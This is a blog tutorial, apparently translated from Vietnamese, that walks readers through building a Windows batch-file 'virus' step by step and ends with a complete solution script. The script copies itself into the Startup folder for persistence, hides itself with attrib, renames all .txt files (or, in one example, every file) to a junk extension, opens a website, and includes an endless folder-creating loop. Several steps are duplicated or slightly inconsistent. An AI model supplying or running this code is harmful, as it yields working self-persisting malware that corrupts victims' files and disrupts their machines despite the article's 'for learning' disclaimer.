Hello friends, today AnonyViet will guide you in detail to write an extremely simple Virus program, through this article will help you gain more knowledge about the CMD command in Windows, thereby serving as a foundation to understand more. Power Shell if you like in-depth research.
| Join the channel Telegram of the AnonyViet 👉 Link 👈 |
In this article we will explain the most basic commands of CMD, and depending on your thinking you can develop this virus to be more dangerous. However, the purpose is to explore and learn, not to destroy, so you should not use your knowledge to destroy others.
Now we will go through each specific command in CMD, then assemble it into a complete set of code to execute the virus.
Lesson 1: Instructions for writing a powerful virus that breaks Windows
Lesson 2: Increase the power of Virus to break Windows
Prepare
- Notepad
- Open CMD (press Windows R key, type up cmd)
- Use a virtual machine or go to a net shop to test
Specify the working directory
First, we need to point the command prompt to a fixed path for easy testing. In this article, I will leave the path as drive D: for easy management
Type command:
D:
then our working path will be drive D:
Create File with echo . command
To create a virus, of course, you must create a file containing the commands to execute the virus, in CMD we use the echo command to create a file with content, with the following command structure:
echo > virus.bat
This command allows us to create a file called virus.bat, but without content.
Next, we add content to the virus.bat file with the command:
echo off: used to turn off the command display when executing the file
echo echo off > x.bat echo "noi dung dong 1" >> virus.bat echo "noi dung dong 2" >> virus.bat echo "noi dung dong 3" >> virus.bat
Summary:
- 1 sign > is to create files
- 2 signs >> is to add file content
Now we access the D: drive, we will see there is a file named virus.bat, and use notepad to open this file, so we will see the content as shown below.
Change font color in CMD
To make the children of the virus more vivid, we can change the font color from classic white after other colors such as blue, red, purple, yellow …. You use the command: color the number to specify the color.
Eg: to turn letters green, the color code is numbers 2 then we type the command
color 2
Use the Copy command to copy
If you want this Virus to hide in a certain folder, or you want this virus to start under Windows, every time you start Windows, the Virus will execute itself, you need to let it copy itself to the Startup path.
The directory where the files are to be started with Windows is specified as
"C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
So we need to copy this Virus to the above directory, using the Windows command
copy virus.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Virus’s way of hiding
To hide myself and avoid detection by the naked eye, I will use the command attrib to manually set the hidden file mode.
Because I copied this virus to the Startup folder, I need to move the command prompt to that folder, use the command CD to move the prompt
cd "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Next use the command attrib to hide files
attrib +h virus.bat
Change File extension
To increase the danger of the Virus, we will change the extension of all files found to a different extension specified by you, using the ren command.
Eg: To change all files with the .exe extension to the .anonyviet extension, we use the command:
ren *.exe *.anonyviet
Eg: To change all files and all extensions to the .anonyviet extension, we use the command:
ren *.* *.anonyviet
*.* //all files and all extensions
*.anonyviet // change all to .anonyviet
Executing File
To let the virus activate any file or activate itself, use the command
start “name of the program you want to activate”
For example, if you want the Virus to open the website anonyviet.con by itself, use the command
start https://anonyviet.com
For example, if you want Virus to automatically open the file virus.bat
start d:\virus.bat
Loop
You open a notepad file and type the command below, then save a file with len voilap.bat, to see how it works.
Please see the example below:
@echo off d: cd virus :x md %random% goto x
d: // go to the working directory of drive D:
md anonyviet // create directory named
cd anonyviet // move the cursor to the directory anonyviet
: x is the starting point of the loop
md: directory creation command
%ramdom%: command to generate random numbers
goto x back to the starting point
Thus, the path would be:
- Command executes to section x,
- It will be create 1 folder with random names,
- Meet goto x command will return x
- And continue create 1 folder with random name
- Then see you goto xit’s back again x
- And continue create folder
Create an endless loop.
Simple virus writing exercise in cmd:
Complete simple virus code 1 with request
- Create a file named virus.bat located in drive D:
- The content of the virus.bat file displays the text AnonyViet is Attacking, green color
- This Virus file will change the extension of all files .txt in the D drive to the tail wall .anonyviet
- Self-copy to Windows Startup folder
- Hiding yourself
- Self-activate anonyviet.bat
OK now we open up notepad and type the following commands:
Solution:
Step 1: Open up notepad and retype the commands below,
Step 2: save the notepad file as baigiai.bat
Step 3: Execute the file baigiai.bat and see the result
Step 4: Restart the machine and see the result
Details of the solution
- Create and create an anonyviet.bat file in drive D: with the command echo
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat
2. File Virus This virus will change the extension of all files .txt in the D drive to the tail wall .anonyviet
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat
3. File Virus This virus will change the extension of all files .txt in the D drive to the tail wall .anonyviet
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat
4. Open the website yourself https://anonyviet.com
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat echo start https://anonyviet.com
4. Copy to Windows’ Startup folder
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat echo start https://anonyviet.com copy anonyviet.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
5. Hide yourself
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat echo start https://anonyviet.com >> anonyviet.bat copy anonyviet.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" echo attrib +h "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anonyviet.bat" >> anonyviet.bat echo pause >> anonyviet.bat
6. Execute file anonyviet.bat
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat echo start https://anonyviet.com >> anonyviet.bat copy anonyviet.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" echo attrib +h "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anonyviet.bat" >> anonyviet.bat echo pause >> anonyviet.bat start anonyviet.bat
Now you Save enter this code notepad to name baigiai.bat
Then start the file baigiai.bat to see the results
So with the above code, every time you start Windows, it will automatically search in drive D for files with the .txt extension, it will automatically switch to the .anonyviet extension and start up AnonyViet’s website.
The second post I’m writing, will give strength to this virus, please read it
